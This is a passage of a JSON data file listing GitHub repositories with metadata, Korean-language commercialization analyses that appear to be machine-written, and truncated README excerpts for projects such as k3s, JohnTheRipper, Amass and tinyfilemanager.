pod-install ios\n```\n\n## Post-inst","composite_score":0.1089,"license_safety_tag":"safe"},{"name":"vredniy/awesome-newsletters","github_url":"https://github.com/vredniy/awesome-newsletters","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# awesome-newsletters 상업화 분석\n\n## 왜 보물인가\n좋은 뉴스레터를 한곳에 모아놓은 가이드로, 정보 과다 시대에 질 좋은 콘텐츠를 찾고 싶은 사람들의 시간을 절약해줍니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스레터 추천 플랫폼 SaaS**: 사용자 관심사에 맞는 뉴스레터를 자동으로 추천해주는 구독 서비스\n2. **회사 내부 학습 도구*","readme_excerpt":"A curated list of newsletters, awesome newsletters. [![Awesome](https://awesome.re/badge.svg)](https://github.com/sindresorhus/awesome#readme)\n\nInspired by the `awesome-*` trend on GitHub.\n\nThe goal is to build a categorized community-driven collection of very well-known resources.\n\nSharing, suggestions and contributions are always welcome! Please take a look at the [contribution guidelines](https://github.com/zudochkin/awesome-newsletters/blob/master/CONTRIBUTING.md) first.\n\nThanks to all [contributors](https://github.com/zudochkin/awesome-newsletters/graphs/contributors).\n\n- [Frontend](#frontend)\n  - [General Web Development](#general-web-development)\n  - [JavaScript](#javascript)\n    - [React](#react)\n    - [EmberJS](#emberjs)\n    - [VueJS](#vuejs)\n    - [Svelte](#svelte)\n  - [Data Visualization](#data-visualization)\n  - [CSS](#css)\n  - [Design](#design)\n  - [HTML5](#html5)\n  - [SVG](#svg)\n  - [GraphQL](#graphql)\n- [Programming](#programming)\n  - [General Section](#general-section)\n","composite_score":0.1085,"license_safety_tag":"unknown"},{"name":"magnumripper/JohnTheRipper","github_url":"https://github.com/magnumripper/JohnTheRipper","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":1,"description":"# magnumripper/JohnTheRipper 분석\n\n## 왜 보물인가\n까다로운 암호를 빠르게 찾아내는 보안 전문가용 도구로, 기업들이 자신의 시스템 보안을 점검할 때 필수적으로 사용합니다.\n\n## 어디에 쓸 수 있나\n1. **보안 컨설팅 회사의 온라인 서비스** - 고객사의 암호 강도를 자동으로 테스트하는 웹 기반 진단 도구\n2. **기업 IT부서용","readme_excerpt":"[![Circle CI](https://circleci.com/gh/openwall/john/tree/bleeding-jumbo.svg?style=shield)](https://circleci.com/gh/openwall/john/tree/bleeding-jumbo)\n[![Downloads](https://img.shields.io/badge/Download-Windows%20Build-blue.svg)](https://github.com/openwall/john-packages/releases)\n[![License](https://img.shields.io/badge/License-GPL%20v2%2B-blue.svg)](https://github.com/openwall/john/blob/bleeding-jumbo/doc/LICENSE)\n![GitHub commit activity](https://img.shields.io/github/commit-activity/m/openwall/john?color=yellow)\n![GitHub commits since tagged version](https://img.shields.io/github/commits-since/openwall/john/1.9.0-Jumbo-1?color=brown)\n\nJohn the Ripper\n===============\n\nThis is the community-enhanced, \"jumbo\" version of John the Ripper.\nIt has a lot of code, documentation, and data contributed by jumbo\ndevelopers and the user community.  It is easy for new code to be added\nto jumbo, and the quality requirements are low, although lately we've\nstarted subjecting all contributions to quit","composite_score":0.1081,"license_safety_tag":"unknown"},{"name":"KubeOperator/KubePi","github_url":"https://github.com/KubeOperator/KubePi","stars":5,"language":"Go","license":"GPL-3.0","abandonment_months":5,"description":"# KubeOperator/KubePi 사업화 분석\n\n## 왜 보물인가\n복잡한 서버 관리 시스템을 누구나 쉽게 다룰 수 있도록 만든 관리 도구로, 기업의 IT 운영 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 SaaS 서비스**\n- 중소기업 대상 클라우드 인프라 관리 플랫폼으로 월 구독 서비스 제공\n\n**2. 내부 업무 도","readme_excerpt":"<p align=\"center\"><a href=\"https://kubeoperator.io\"><img src=\"https://kubeoperator.oss-cn-beijing.aliyuncs.com/kubepi/img/logo-red.png\" alt=\"kubepi\" width=\"300\" /></a></p>\n<P align=\"center\"><b>KubePi</b> [kubəˈpaɪ]，一个现代化的 K8s 面板。</P>\n<p align=\"center\">\n  <a href=\"https://www.gnu.org/licenses/gpl-3.0.html\"><img src=\"https://shields.io/github/license/1Panel-dev/KubePi?color=%231890FF\" alt=\"License: GPL v3\"></a>\n  <a href=\"https://github.com/1Panel-dev/KubePi/releases\"><img src=\"https://img.shields.io/github/v/release/1Panel-dev/KubePi\" alt=\"GitHub release\"></a>\n  <a href=\"https://github.com/1Panel-dev/KubePi\"><img src=\"https://img.shields.io/github/stars/1Panel-dev/KubePi?color=%231890FF&style=flat-square\" alt=\"GitHub Stars\"></a>\n  <a href=\"https://hub.docker.com/r/1panel/kubepi\"><img src=\"https://img.shields.io/docker/pulls/1panel/kubepi?label=downloads\" alt=\"Docker Pulls\"></a>\n</p>\n<hr />\n\n## KubePi 是什么？\n\nKubePi 是一个现代化的 K8s 面板。KubePi 允许管理员导入多个 Kubernetes 集群，并且通过权限控制，将不同 cluster、namespa","composite_score":0.108,"license_safety_tag":"restricted"},{"name":"rancher/k3s","github_url":"https://github.com/rancher/k3s","stars":13,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# K3s 저장소 분석\n\n## 왜 보물인가\n작은 규모의 컴퓨터 서버도 쉽게 관리할 수 있도록 만든 도구로, 기업들이 복잡한 시스템 운영을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **엣지 컴퓨팅 플랫폼**: 소규모 지점이나 원격지의 서버를 중앙에서 통제하는 SaaS 서비스\n- **IoT 기기 관리 시스템**: 수천 개의 작은 센서나 기계들을 한","readme_excerpt":"K3s - Lightweight Kubernetes\n===============================================\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B25850%2Fgithub.com%2Fk3s-io%2Fk3s.svg?type=shield)](https://app.fossa.com/projects/custom%2B25850%2Fgithub.com%2Fk3s-io%2Fk3s?ref=badge_shield)\n[![Nightly CI](https://github.com/k3s-io/k3s/actions/workflows/nightly-install.yaml/badge.svg)](https://github.com/k3s-io/k3s/actions/workflows/nightly-install.yaml)\n[![Build Status](https://drone-publish.k3s.io/api/badges/k3s-io/k3s/status.svg)](https://drone-publish.k3s.io/k3s-io/k3s)\n[![Integration Test Coverage](https://github.com/k3s-io/k3s/actions/workflows/integration.yaml/badge.svg)](https://github.com/k3s-io/k3s/actions/workflows/integration.yaml)\n[![Unit Test Coverage](https://github.com/k3s-io/k3s/actions/workflows/unitcoverage.yaml/badge.svg)](https://github.com/k3s-io/k3s/actions/workflows/unitcoverage.yaml)\n[![OpenSSF Best Practices](https://www.bestpractices.dev/projects/6835/badge)](https://ww","composite_score":0.1079,"license_safety_tag":"safe"},{"name":"plasma-umass/coz","github_url":"https://github.com/plasma-umass/coz","stars":8,"language":"C","license":"NOASSERTION","abandonment_months":1,"description":"# COZ (plasma-umass/coz) 분석 보고서\n\n## 왜 보물인가\n프로그램이 느려지는 이유를 자동으로 찾아주는 도구로, 소프트웨어 개발자들이 수십 시간 걸리는 성능 분석 작업을 몇 분으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 성능 모니터링 서비스**: 고객의 애플리케이션이 왜 느린지 자동 진단하고 개선안을 제시하는 클","readme_excerpt":"# Coz: Finding Code that Counts with Causal Profiling\n\nby [Charlie Curtsinger](https://curtsinger.cs.grinnell.edu/) and [Emery Berger](https://emeryberger.com)\n\n[![Rust Crate downloads](https://img.shields.io/crates/d/coz?logo=rust&link=https%3A%2F%2Fcrates.io%2Fcrates%2Fcoz)](https://crates.io/crates/coz)\n\nCoz is a profiler for native code (C/C++/Rust) that unlocks\noptimization opportunities missed by traditional profilers. Coz\nemploys a novel technique called *causal profiling* that measures\noptimization potential. It predicts what the impact of optimizing code\nwill have on overall throughput or latency.\n\nProfiles generated by Coz show the \"bang for buck\" of optimizing a\nline of code in an application. In the below profile, almost every\neffort to optimize the performance of this line of code directly leads\nto an increase in overall performance, making it an excellent\ncandidate for optimization efforts.\n\n![Example Coz profile](https://github.com/plasma-umass/coz/blob/master/example-co","composite_score":0.1076,"license_safety_tag":"unknown"},{"name":"emitter-io/emitter","github_url":"https://github.com/emitter-io/emitter","stars":6,"language":"Go","license":"agpl-3.0","abandonment_months":1,"description":"# Emitter-IO/Emitter 분석 보고서\n\n## 왜 보물인가\n실시간으로 정보를 주고받아야 하는 채팅, 알림, 라이브 업데이트 같은 서비스를 만들 때 필요한 핵심 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 협업 도구 SaaS**: 팀이 동시에 문서를 편집하거나 채팅할 때 모든 사용자에게 즉시 반영되는 기능\n2. **IoT 기기 ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://s3.amazonaws.com/cdn.misakai.com/www-emitter/logo/emitter_logo_blue.png\" border=\"0\" alt=\"kelindar/column\">\n<br>\n<img src=\"https://img.shields.io/github/go-mod/go-version/emitter-io/emitter\" alt=\"Go Version\">\n<a href=\"https://goreportcard.com/report/github.com/emitter-io/emitter\"><img src=\"https://goreportcard.com/badge/github.com/emitter-io/emitter\" alt=\"Go Report Card\"></a>\n<a href=\"https://coveralls.io/github/emitter-io/emitter\"><img src=\"https://coveralls.io/repos/github/emitter-io/emitter/badge.svg\" alt=\"Coverage\"></a>\n<a href=\"https://twitter.com/emitter_io\"><img src=\"https://img.shields.io/twitter/follow/emitter_io.svg?style=social&label=Follow\" alt=\"Twitter\"></a>\n</p>\n\n## Emitter: Distributed Publish-Subscribe Platform\n\nEmitter is a distributed, scalable and fault-tolerant publish-subscribe  platform built with MQTT protocol and featuring message storage, security, monitoring and more:\n* **Publish/Subscribe** using MQTT over TCP or Websockets","composite_score":0.1075,"license_safety_tag":"risky"},{"name":"alidili/Demos","github_url":"https://github.com/alidili/Demos","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":5,"description":"# alidili/Demos 분석\n\n## 왜 보물인가\n정확한 설명 없이 저장소 규모(6개 스타, 마지막 업데이트 2025년)도 미래 시점이라 신뢰도가 낮으며, 구체적인 가치 판단이 불가능합니다.\n\n## 어디에 쓸 수 있나\n저장소 설명이 없어 실제 용도를 파악할 수 없습니다. 코드 샘플 검토 후 다음 시나리오를 검토해야 합니다:\n- 개발자 교육용 예제 제공 ","readme_excerpt":"# Demo合集\n\n## 1. MPAndroidChart折线图 [源码](https://github.com/alidili/Demos/tree/master/MPAndroidChartDemo)\n\n[![](https://img.shields.io/badge/APK%20download-1.79M-green.svg)](https://github.com/alidili/Demos/raw/master/MPAndroidChartDemo/MPAndroidChartDemo.apk)\n\n[《Android图表 MPAndroidChart折线图》](http://blog.csdn.net/kong_gu_you_lan/article/details/53634368)\n\n![折线图](http://upload-images.jianshu.io/upload_images/3270074-3927ef98caa3508b.gif?imageMogr2/auto-orient/strip)\n\n## 2. Retrofit + RxJava使用详解 [源码](https://github.com/alidili/Demos/tree/master/RetrofitDemo)\n\n[![](https://img.shields.io/badge/APK%20download-1.93M-green.svg)](https://github.com/alidili/Demos/raw/master/RetrofitDemo/RetrofitDemo.apk)\n\n[《Android Retrofit + RxJava使用详解》](http://blog.csdn.net/kong_gu_you_lan/article/details/73504345)\n\n[《Android 探讨一下Retrofit封装的最佳姿势》](http://blog.csdn.net/kong_gu_you_lan/article/details/73733922)\n\n## 3. 谈谈我所理解的MVP [源码](https://github.com/alidili/Demos/tree/master/MVPDemo)\n\n[![](https://img.shields","composite_score":0.1074,"license_safety_tag":"safe"},{"name":"visionmedia/superagent","github_url":"https://github.com/visionmedia/superagent","stars":10,"language":"JavaScript","license":"mit","abandonment_months":5,"description":"# Superagent 저장소 평가\n\n## 왜 보물인가\n웹 요청을 간단하게 처리해주는 도구로, 개발자들이 인터넷에서 데이터를 주고받을 때 필요한 반복 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 외부 API와 연동하는 데이터 수집 플랫폼 (예: 소셜미디어 모니터링 서비스)\n2. **내부 업무 도구**: 여러 웹사이","readme_excerpt":"# superagent\n\n[![build status](https://github.com/forwardemail/superagent/actions/workflows/ci.yml/badge.svg)](https://github.com/forwardemail/superagent/actions/workflows/ci.yml)\n[![code coverage](https://img.shields.io/codecov/c/github/ladjs/superagent.svg)](https://codecov.io/gh/ladjs/superagent)\n[![code style](https://img.shields.io/badge/code_style-XO-5ed9c7.svg)](https://github.com/sindresorhus/xo)\n[![styled with prettier](https://img.shields.io/badge/styled_with-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n[![made with lass](https://img.shields.io/badge/made_with-lass-95CC28.svg)](https://lass.js.org)\n[![license](https://img.shields.io/github/license/ladjs/superagent.svg)](LICENSE)\n\n> Small progressive client-side HTTP request library, and Node.js module with the same API, supporting many high-level HTTP client features.  Maintained for [Forward Email](https://github.com/forwardemail) and [Lad](https://github.com/ladjs).\n\n\n## Table of Contents\n\n* [Install](#instal","composite_score":0.1073,"license_safety_tag":"safe"},{"name":"mdn/webextensions-examples","github_url":"https://github.com/mdn/webextensions-examples","stars":7,"language":"JavaScript","license":"mpl-2.0","abandonment_months":0,"description":"# MDN WebExtensions Examples 분석\n\n## 왜 보물인가\n웹브라우저에 기능을 추가하는 방법을 배우고 싶은 개발자들이 실제 작동하는 예제 코드를 무료로 찾을 수 있는 공식 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 웹브라우저 확장 프로그램 개발 플랫폼을 만들어 소비자에게 구독료로 판매\n2. **내부 ","readme_excerpt":"# webextensions-examples [![Build Status](https://travis-ci.org/mdn/webextensions-examples.svg?branch=master)](https://travis-ci.org/mdn/webextensions-examples)\n\n[https://github.com/mdn/webextensions-examples](https://github.com/mdn/webextensions-examples)\n\nMaintained by Mozilla's [Add-ons team](https://wiki.mozilla.org/Add-ons).\n\nWebExtensions are a way to write browser extensions: that is, programs\ninstalled inside a web browser that modify the behavior of the browser or\nweb pages loaded by the browser. WebExtensions are built on a set of\ncross-browser APIs, so WebExtensions written for Google Chrome, Opera, or \nEdge will, in most cases, run in Firefox too.\n\nThe \"webextensions-examples\" repository is a collection of simple, \ncomplete, and installable WebExtensions. The examples show how to use the\nWebExtensions APIs, and you can use them as a starting point for your \nWebExtensions.\n\nFor an index of all the examples, see the [\"Example extensions\" page on MDN](https://developer.mozilla","composite_score":0.1069,"license_safety_tag":"unknown"},{"name":"ornicar/lila","github_url":"https://github.com/ornicar/lila","stars":5,"language":"Scala","license":"AGPL-3.0","abandonment_months":0,"description":"# ornicar/lila 상용화 분석\n\n## 왜 보물인가\n오픈소스 기반의 완성도 높은 온라인 게임 플랫폼으로, 자체 운영 또는 화이트라벨 형태의 비즈니스 모델 구축이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 체스 또는 보드게임 플랫폼을 독점 브랜드로 운영하고, 월간 구독료로 수익화\n2. **내부 업무 도구**: 기업 직원 간","readme_excerpt":"# [lichess.org](https://lichess.org)\n\n[![Crowdin](https://d322cqt584bo4o.cloudfront.net/lichess/localized.svg)](https://crowdin.com/project/lichess)\n[![Mastodon](https://img.shields.io/mastodon/follow/109298525492334687?domain=mastodon.online)](https://mastodon.online/@lichess)\n[![Bluesky](https://img.shields.io/badge/Bluesky-0285FF?logo=bluesky&logoColor=fff)](https://bsky.app/profile/lichess.org)\n[![Discord](https://img.shields.io/discord/280713822073913354?label=Discord&logo=discord&style=flat)](https://discord.gg/lichess)\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/lichess-org/lila)\n\n<img src=\"https://raw.githubusercontent.com/lichess-org/lila/master/public/images/home-bicolor.png\" alt=\"Lichess homepage\" title=\"Lichess comes with light and dark theme, this screenshot shows both.\" />\n\nLila (li[chess in sca]la) is a free online chess game server focused on [realtime](https://lichess.org/games) gameplay and ease of use.\n\nIt features a [search engine](https:/","composite_score":0.1067,"license_safety_tag":"risky"},{"name":"HashPals/Name-That-Hash","github_url":"https://github.com/HashPals/Name-That-Hash","stars":9,"language":"Python","license":"GPL-3.0","abandonment_months":5,"description":"# Name-That-Hash 저장소 분석\n\n## 왜 보물인가\n암호화된 텍스트가 어떤 방식으로 변환되었는지 자동으로 식별해주는 도구로, 사이버 보안 전문가부터 일반인까지 누구나 필요로 하는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 사이버 보안 SaaS 서비스**\n- 기업의 유출된 비밀번호를 분석하고 보안 위협을 진단하는 클라우드 기반 서","readme_excerpt":"<p align=\"center\">\n\n<img src=\"logo.gif\">\n<p align=\"center\">➡️ <a href=\"http://discord.skerritt.blog\">Discord</a> | <a href=\"https://nth.skerritt.blog\">Website</a> ⬅️</p>\n<p align=\"center\">The Modern Hash Identification System<br>\n<code>pip3 install name-that-hash && nth</code>\n  <br>\n  <a href=\"https://nth.skerritt.blog\">Web App with no install needed</a>\n</p>\n\n<p align=\"center\">\n  <img alt=\"Discord\" src=\"https://img.shields.io/discord/754001738184392704\"> <img alt=\"PyPI - Downloads\" src=\"https://pepy.tech/badge/name-that-hash/month\">  <img alt=\"Twitter Follow\" src=\"https://img.shields.io/twitter/follow/bee_sec_san?style=social\"> <img alt=\"PyPI - Python Version\" src=\"https://img.shields.io/pypi/pyversions/name-that-hash\"> <img alt=\"PyPI\" src=\"https://img.shields.io/pypi/v/name-that-hash\">\n</p>\n<hr>\n\n# 🤔 What is this?\n\n![](images/demo_smaller.gif)\n\nHave you ever come across a hash such as `5f4dcc3b5aa765d61d8327deb882cf99` and wondered what type of hash that is? 🤔\n\nName-that-hash will n","composite_score":0.1066,"license_safety_tag":"restricted"},{"name":"declandewet/vue-meta","github_url":"https://github.com/declandewet/vue-meta","stars":7,"language":"JavaScript","license":"mit","abandonment_months":8,"description":"# vue-meta 상용화 분석\n\n## 왜 보물인가\n웹사이트의 검색 최적화와 소셜 미디어 공유 기능을 자동으로 관리해주는 도구로, 디지털 마케팅 효과를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 블로그 플랫폼이나 포트폴리오 제작 서비스에서 사용자들의 콘텐츠가 검색엔진에 잘 노출되도록 하는 기능 제공\n- **내부 업무 도","readme_excerpt":"# This project is not actively maintained anymore.\n## More information can be found in https://github.com/nuxt/vue-meta/issues/808\n\n---\n\n\n### :v::3rd_place_medal:  Check the [next](https://github.com/nuxt/vue-meta/tree/next) branch for Vue3 support\n--------------\n\n\n<p align=\"center\">\n  <img src=\"./docs/.vuepress/public/vue-meta.png\" alt=\"vue-meta\" />\n</p>\n\n<h5 align=\"center\">\n  Manage HTML metadata in Vue.js components with SSR support\n</h5>\n\n<p align=\"center\">\n  <a href=\"http://npm-stat.com/charts.html?package=vue-meta\"><img src=\"https://img.shields.io/npm/dm/vue-meta.svg\" alt=\"npm downloads\"></a>\n  <a href=\"http://npmjs.org/package/vue-meta\"><img src=\"https://img.shields.io/npm/v/vue-meta.svg\" alt=\"npm version\"></a>\n  <a href=\"https://codecov.io/gh/nuxt/vue-meta\"><img src=\"https://badgen.net/codecov/c/github/nuxt/vue-meta/master\" alt=\"Coverage Status\"></a>\n  <a href=\"https://circleci.com/gh/nuxt/vue-meta/\"><img src=\"https://badgen.net/circleci/github/nuxt/vue-meta\" alt=\"Build Status\"","composite_score":0.1064,"license_safety_tag":"safe"},{"name":"mozilla/foundation.mozilla.org","github_url":"https://github.com/mozilla/foundation.mozilla.org","stars":5,"language":"Python","license":"MPL-2.0","abandonment_months":0,"description":"# mozilla/foundation.mozilla.org 상용화 분석\n\n## 왜 보물인가\nMozilla 재단의 공식 웹사이트로, 인터넷 개인정보 보호라는 사회적 영향력 높은 미션을 담은 신뢰도 높은 디지털 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **비영리 단체 웹사이트 빌더 SaaS**: 사회 운동 조직들이 이 사이트의 구조와 디자인을 템플릿으로 ","readme_excerpt":"## Frontend Workflow for the \"Redesign Site\"\n\n### Development Mode\n\n- Make sure the `DEBUG` environment variable is set to `True` so that Django and Docker serve updated compiled files correctly.\n- Run `docker-compose up` from the root of the codebase (not from `./frontend`).\n- Develop as usual.\n\n### CSS\n\n- SCSS files are located in `./foundation_cms/static/scss`.\n- These are automatically compiled into `.css` files as part of the build process.\n\n## Frontend commands\n\n- The frontend is composed of two yarn workspaces defined in a root `package.json` file. The two workspaces are\nlocated in `frontend/legacy` and `frontend/redesign`. Running `yarn` commands from the root will trigger\nthe root scripts defined in the root `package.json` and are helper scripts defined to run for all workspaces.\nTo run `yarn` commands from an individual workspace, you can `cd` into the workspace, or you can use workspace\nsyntax from the root directory (for exapmle: `yarn workspace redesign lint`)\n\n## Check Li","composite_score":0.1064,"license_safety_tag":"unknown"},{"name":"prasathmani/tinyfilemanager","github_url":"https://github.com/prasathmani/tinyfilemanager","stars":6,"language":"PHP","license":"GPL-3.0","abandonment_months":2,"description":"# tinyfilemanager 상용화 분석\n\n## 왜 보물인가\n누구나 인터넷 브라우저로 자신의 파일을 관리할 수 있는 간단한 도구로, 복잡한 프로그램 설치 없이 회사나 학교의 파일 공유 시스템을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (개인 클라우드 저장소)**\n- 소규모 팀을 위한 \"나만의 클라우드\" 구독 상품으로 월 ","readme_excerpt":"# Tiny File Manager\n\n[![Live demo](https://img.shields.io/badge/Live-Demo-brightgreen.svg?style=flat-square)](https://tinyfilemanager.github.io/demo/)\n[![Live demo](https://img.shields.io/badge/Help-Docs-lightgrey.svg?style=flat-square)](https://github.com/prasathmani/tinyfilemanager/wiki)\n[![GitHub Release](https://img.shields.io/github/release/prasathmani/tinyfilemanager.svg?style=flat-square)](https://github.com/prasathmani/tinyfilemanager/releases)\n[![GitHub License](https://img.shields.io/github/license/prasathmani/tinyfilemanager.svg?style=flat-square)](https://github.com/prasathmani/tinyfilemanager/blob/master/LICENSE)\n[![Paypal](https://img.shields.io/badge/Donate-Paypal-lightgrey.svg?style=flat-square)](https://www.paypal.me/prasathmani)\n![GitHub Sponsors](https://img.shields.io/github/sponsors/prasathmani)\n\n> TinyFileManager is a versatile web-based PHP file manager designed for simplicity and efficiency. This lightweight single-file PHP application can be effortlessly integr","composite_score":0.1063,"license_safety_tag":"restricted"},{"name":"mars885/hilt-binder","github_url":"https://github.com/mars885/hilt-binder","stars":8,"language":"Kotlin","license":"Apache-2.0","abandonment_months":5,"description":"# mars885/hilt-binder 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 설정 작업을 자동화할 수 있게 도와주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 안드로이드 개발자용 저코드 앱 빌더 서비스로 제공\n- **내부 업무 도구**: 대기업 개발팀의 앱 개발 자동화 플랫폼 구축\n- **API 판매**","readme_excerpt":"# HiltBinder\nAn annotating processing library that automatically generates Dagger Hilt's `@Binds` methods.\n\n[![Platform](https://img.shields.io/badge/platform-Android-green.svg)](http://developer.android.com/index.html)\n[![Download](https://img.shields.io/maven-central/v/com.paulrybitskyi/hilt-binder.svg?label=Download)](https://search.maven.org/search?q=com.paulrybitskyi.hilt-binder)\n[![Build](https://github.com/mars885/hilt-binder/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/mars885/hilt-binder/actions)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n## Contents\n* [Motivation](#motivation)\n* [Installation](#installation)\n  * [Java](#java)\n  * [KAPT](#kapt)\n  * [KSP](#ksp)\n* [Usage](#usage)\n  * [Basics](#basics)\n  * [Hilt Components](#hilt-components)\n    * [Predefined](#predefined)\n    * [Custom](#custom)\n  * [Multibindings](#multibindings)\n  * [Qualifiers](#qualifiers)\n  * [Generic Type","composite_score":0.1059,"license_safety_tag":"safe"},{"name":"sdrapkin/SecurityDriven.Core","github_url":"https://github.com/sdrapkin/SecurityDriven.Core","stars":31,"language":"C#","license":"MIT","abandonment_months":4,"description":"# SecurityDriven.Core 상용화 분석\n\n## 왜 보물인가\n민감한 정보를 안전하게 보호하는 기본 도구 모음으로, 온라인 서비스에서 고객 데이터 유출을 방지하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융·의료 SaaS**: 회원 정보와 거래 기록을 암호화하여 저장하는 클라우드 서비스\n2. **기업 내부 업무 도구**: 직원 인사","readme_excerpt":"# **CryptoRandom** [![GitHub Actions](https://github.com/sdrapkin/SecurityDriven.Core/workflows/.NET%20CI/badge.svg)](https://github.com/sdrapkin/SecurityDriven.Core/actions) [![NuGet](https://img.shields.io/nuget/v/CryptoRandom.svg)](https://www.nuget.org/packages/CryptoRandom/)\n\n### by [Stan Drapkin](https://github.com/sdrapkin/)\n\n## **CryptoRandom** : Random\n\n* **.NET Random done right**\n* [Fast], [Thread-safe], [Cryptographically strong]: choose 3\n* Subclasses and replaces `System.Random`\n* Also replaces `System.Security.Cryptography.RandomNumberGenerator` ([link](https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator))\n* `CryptoRandom` is (unlike `System.Random`):\n\t* **Fast** (much faster than `Random` or `RandomNumberGenerator`)\n\t* **Thread-safe** (all APIs)\n\t* **Cryptographically strong** (seeded or unseeded)\n* Implements [Fast-Key-Erasure](https://blog.cr.yp.to/20170723-random.html) RNG for seeded `CryptoRandom`\n* Produces *the same* sequ","composite_score":0.1058,"license_safety_tag":"safe"},{"name":"YoYo000/BlendedMVS","github_url":"https://github.com/YoYo000/BlendedMVS","stars":5,"language":"","license":"unknown","abandonment_months":9,"description":"# BlendedMVS 사업화 분석\n\n## 왜 보물인가\n여러 개의 사진으로 3차원 입체 모델을 자동으로 만드는 기술로, 건축·부동산·게임·영화 제작에 필수적인 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 중개 SaaS**: 부동산 매물을 360도 3D 투어로 전환하여 구매자가 온라인에서 집을 구석구석 확인하게 하는 서비스\n2. **건설사 내","readme_excerpt":"# BlendedMVS\n\n\n## Important Update on Dataset Download\n\nWe created a Github release for stable download of the BlendedMVS/+/++ dataset. If you encounter problem downloading with the previews OneDrive Link, please try download the dataset as the release artifacts (please refer to [issue #40](https://github.com/YoYo000/BlendedMVS/issues/40))\n\nDownload BlendedMVS:\n```\nwget https://github.com/YoYo000/BlendedMVS/releases/download/v1.0.0/BlendedMVS.zip\n```\n\nDownload BlendedMVS+\n```\n#!/bin/bash\n\n# Base URL\nBASE_URL=\"https://github.com/YoYo000/BlendedMVS/releases/download/v1.0.1\"\n\n# Download split files BlendedMVS1.z01 to BlendedMVS1.z42\nfor i in $(seq -w 1 42); do\n    FILE=\"BlendedMVS1.z$i\"\n    echo \"Downloading $FILE...\"\n    wget -c \"${BASE_URL}/${FILE}\"\ndone\n\n# Download the final .zip descriptor\nZIP_FILE=\"BlendedMVS1.zip\"\necho \"Downloading $ZIP_FILE...\"\nwget -c \"${BASE_URL}/${ZIP_FILE}\"\n\necho \"All files downloaded.\"\n```\n\nDownload BlendedMVS++\n```\n#!/bin/bash\n\n# Base URL\nBASE_URL=\"https://gi","composite_score":0.1054,"license_safety_tag":"unknown"},{"name":"OWASP/Amass","github_url":"https://github.com/OWASP/Amass","stars":8,"language":"Go","license":"NOASSERTION","abandonment_months":1,"description":"# OWASP/Amass 보물 분석\n\n## 왜 보물인가\n인터넷에 공개된 회사의 모든 디지털 자산(웹사이트, 서버 등)을 자동으로 찾아내는 보안 도구로, 사이버 공격 예방에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 진단 SaaS**: 중소기업들이 자신의 노출된 디지털 자산을 월 구독으로 정기 점검하는 서비스\n2. **내부 보안팀 도구**","readme_excerpt":"# [![OWASP Logo](https://raw.githubusercontent.com/owasp-amass/docs/master/images/owasp_logo.png) OWASP Amass Project](https://owasp.org/www-project-amass/)\n\n[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-48A646.svg)](https://owasp.org/projects/#sec-flagships)\n[![GitHub Release](https://img.shields.io/github/release/owasp-amass/amass)](https://github.com/owasp-amass/amass/releases/latest)\n[![Go Report](https://goreportcard.com/badge/github.com/owasp-amass/amass)](https://goreportcard.com/report/github.com/owasp-amass/amass)\n[![CodeFactor](https://www.codefactor.io/repository/github/owasp-amass/amass/badge)](https://www.codefactor.io/repository/github/owasp-amass/amass)\n[![Follow on Twitter](https://img.shields.io/twitter/follow/owaspamass.svg?logo=twitter)](https://twitter.com/owaspamass)\n[![Chat on Discord](https://img.shields.io/discord/433729817918308352.svg?logo=discord)](https://discord.gg/ANTyEDUXt5)\n\nThe OWASP Amass Project performs network mapping of a","composite_score":0.1051,"license_safety_tag":"unknown"},{"name":"go-redis/redis","github_url":"https://github.com/go-redis/redis","stars":6,"language":"Go","license":"bsd-2-clause","abandonment_months":0,"description":"# go-redis/redis 프로젝트 분석\n\n## 왜 보물인가\n웹사이트와 앱을 빠르게 만들기 위해 필수적인 '빠른 메모리 저장소' 기술을 Go 프로그래밍 언어로 쉽게 사용할 수 있게 만든 도구입니다.\n\n## 어디에 쓸 수 있나\n**1) SaaS 서비스**: 실시간 사용자 세션 관리가 필요한 온라인 협업 도구나 클라우드 기반 CRM 시스템\n**2) 내부 업","readme_excerpt":"# Redis client for Go\n\n[![build workflow](https://github.com/redis/go-redis/actions/workflows/build.yml/badge.svg)](https://github.com/redis/go-redis/actions)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/redis/go-redis/v9)](https://pkg.go.dev/github.com/redis/go-redis/v9?tab=doc)\n[![Documentation](https://img.shields.io/badge/redis-documentation-informational)](https://redis.io/docs/latest/develop/clients/go/)\n[![Go Report 